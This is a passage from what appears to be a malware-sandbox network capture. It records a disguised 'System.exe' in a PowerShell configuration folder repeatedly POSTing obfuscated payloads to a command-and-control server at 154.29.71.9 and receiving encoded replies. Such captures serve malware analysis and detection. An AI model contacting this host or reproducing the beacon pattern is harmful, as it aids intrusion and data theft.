                                                                                                    Jan 4, 2025 14:53:55.207907915 CET1876OUTData Raw: 59 51 58 5f 5b 5a 58 52 5b 59 5a 55 50 5a 5b 54 56 5d 54 41 52 5d 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YQX_[ZXR[YZUPZ[TV]TAR]R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:/>9Z2!?-$<=4$;8_,2U". 5=U*.(A&;//"Y ']/,
                                                                                                    Jan 4, 2025 14:53:55.437653065 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:55.581074953 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:55 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 5c 26 29 0f 0d 25 2e 20 1d 3a 12 0c 09 28 20 22 08 38 13 2f 00 3f 39 23 5c 2c 0d 3f 12 3e 38 08 44 29 32 2b 19 25 2f 3f 03 2b 36 20 51 03 12 27 5f 31 00 32 1e 3e 0d 39 5c 39 2e 06 43 21 08 3f 5b 32 29 31 02 36 03 32 07 26 2f 2d 55 3e 59 31 54 2e 2e 0d 10 2d 23 3c 1d 3f 05 23 55 0b 1f 25 55 30 0f 3c 56 32 2b 27 00 2b 33 34 59 3c 29 33 1f 20 3a 2b 03 24 3e 0f 02 26 21 3d 55 24 32 3d 5e 27 0a 35 14 36 3d 33 10 25 3a 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"\&)%. :( "8/?9#\,?>8D)2+%/?+6 Q'_12>9\9.C!?[2)162&/-U>Y1T..-#<?#U%U0<V2+'+34Y<)3 :+$>&!=U$2=^'56=3%:.S.-W=YL0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    127192.168.2.450134154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:55.256119967 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:55.618293047 CET2600OUTData Raw: 59 5f 58 5c 5b 58 58 54 5b 59 5a 55 50 5c 5b 51 56 5d 54 48 52 50 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y_X\[XXT[YZUP\[QV]THRPRPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9X.>:&.W)+<= ']8Y/0-5?Q#+:)>,B13-"Y ']/4
                                                                                                    Jan 4, 2025 14:53:55.786510944 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:55.915925980 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:55 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    128192.168.2.450135154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:56.040282965 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:56.395211935 CET2600OUTData Raw: 59 5c 58 5b 5b 5f 58 54 5b 59 5a 55 50 5a 5b 53 56 53 54 49 52 5f 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\X[[_XT[YZUPZ[SVSTIR_R\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:/.&(==+?=0$8[/1!=,58W=4& ]:"Y ']/,
                                                                                                    Jan 4, 2025 14:53:56.589436054 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:56.723822117 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:56 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    129192.168.2.450136154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:56.849648952 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:57.207598925 CET2600OUTData Raw: 5c 5c 5d 5b 5b 5a 5d 54 5b 59 5a 55 50 5e 5b 5a 56 51 54 47 52 5d 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \\][[Z]T[YZUP^[ZVQTGR]RYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:/=5$;==8Y+,$<;"Q6[8!^9U>%3Y."Y ']/<
                                                                                                    Jan 4, 2025 14:53:57.396044970 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:57.531883955 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    130192.168.2.450137154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:57.700385094 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:58.055882931 CET2600OUTData Raw: 59 5a 58 5e 5b 5f 5d 51 5b 59 5a 55 50 5f 5b 55 56 56 54 48 52 58 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YZX^[_]Q[YZUP_[UVVTHRXR[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Y,=)%>T?=X+-$%+(,6>#P5V>X<A1#Y./"Y ']/
                                                                                                    Jan 4, 2025 14:53:58.236494064 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:58.371181965 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    131192.168.2.450138154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:58.506654978 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:58.863821983 CET2600OUTData Raw: 5c 5c 58 5f 5e 58 5d 54 5b 59 5a 55 50 5f 5b 51 56 53 54 41 52 58 52 5d 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \\X_^X]T[YZUP_[QVSTARXR]U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9X/>)[2!=[7(/0+Y;#"=;"85V)-<A%8:/"Y ']/
                                                                                                    Jan 4, 2025 14:53:59.052061081 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:59.187757015 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    132192.168.2.450139154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:59.398880005 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:59.754451990 CET2600OUTData Raw: 59 59 58 58 5b 54 58 5d 5b 59 5a 55 50 50 5b 5a 56 57 54 42 52 5f 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YYXX[TX][YZUPP[ZVWTBR_RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:/.%8>> Y(($+8_/! -?5^)(.7%0(Y-"Y ']/
                                                                                                    Jan 4, 2025 14:53:59.927660942 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:00.058289051 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    133192.168.2.450140154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:00.185419083 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:00.562135935 CET2600OUTData Raw: 59 5f 5d 5c 5e 5f 58 55 5b 59 5a 55 50 50 5b 5b 56 57 54 47 52 5f 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y_]\^_XU[YZUPP[[VWTGR_R[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9/.!^&>=^?=',Z8:V6['W6(W)+%-"Y ']/


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    134192.168.2.450141154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:00.622004986 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:00.973397970 CET1876OUTData Raw: 5c 5a 5d 5d 5b 5c 58 55 5b 59 5a 55 50 59 5b 50 56 5d 54 44 52 5b 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \Z]][\XU[YZUPY[PV]TDR[RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^;>>&8%*'('0(8.#) >86(5*;& '//"Y ']/
                                                                                                    Jan 4, 2025 14:54:01.150546074 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:01.284154892 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 10 25 39 29 08 26 2e 27 09 39 2f 2d 1b 3c 30 3e 45 2f 3d 2f 03 29 29 3c 03 3b 33 2f 5f 3e 16 32 08 2a 21 37 53 27 3f 33 03 2b 0c 20 51 03 12 27 5e 26 07 3a 11 3d 33 29 5d 2e 3d 2c 05 35 08 3b 13 31 39 26 12 21 03 32 06 26 2c 3e 0e 3e 11 04 0e 2e 3e 0e 03 2d 23 02 10 3f 3f 23 55 0b 1f 25 57 24 22 24 19 26 28 20 5d 28 20 30 13 28 2a 27 53 34 3a 30 58 25 2d 36 5b 24 32 3a 08 24 21 31 16 27 1d 29 17 21 10 33 5a 32 00 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"%9)&.'9/-<0>E/=/))<;3/_>2*!7S'?3+ Q'^&:=3)].=,5;19&!2&,>>.>-#??#U%W$"$&( ]( 0(*'S4:0X%-6[$2:$!1')!3Z2.S.-W=YL0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    135192.168.2.450142154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:00.883660078 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:01.238934040 CET2600OUTData Raw: 5c 5e 5d 5a 5b 5d 58 5d 5b 59 5a 55 50 5c 5b 5b 56 55 54 49 52 5a 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \^]Z[]X][YZUP\[[VUTIRZRQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:/.Y&V>$(=;U'8?/325,"8P(>$C1]-"Y ']/4
                                                                                                    Jan 4, 2025 14:54:01.428970098 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:01.563954115 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    136192.168.2.450143154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:01.699866056 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:54:02.052293062 CET2600OUTData Raw: 59 5d 58 50 5e 5b 58 51 5b 59 5a 55 50 5b 5b 50 56 55 54 41 52 5c 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y]XP^[XQ[YZUP[[PVUTAR\R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Y.>"2%>.8<='R%(0,U"U5-"%(>4@$#;:/"Y ']/(
                                                                                                    Jan 4, 2025 14:54:02.342279911 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:02.476561069 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:02 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    137192.168.2.450144154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:02.610212088 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:02.958384037 CET2600OUTData Raw: 5c 59 58 51 5e 5f 58 5d 5b 59 5a 55 50 5d 5b 56 56 52 54 42 52 50 52 5e 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \YXQ^_X][YZUP][VVRTBRPR^U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:/.5[&;.U=;?/S';#"!/Q"^%)7%U<9"Y ']/0
                                                                                                    Jan 4, 2025 14:54:03.146261930 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:03.282156944 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    138192.168.2.450145154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:03.783979893 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
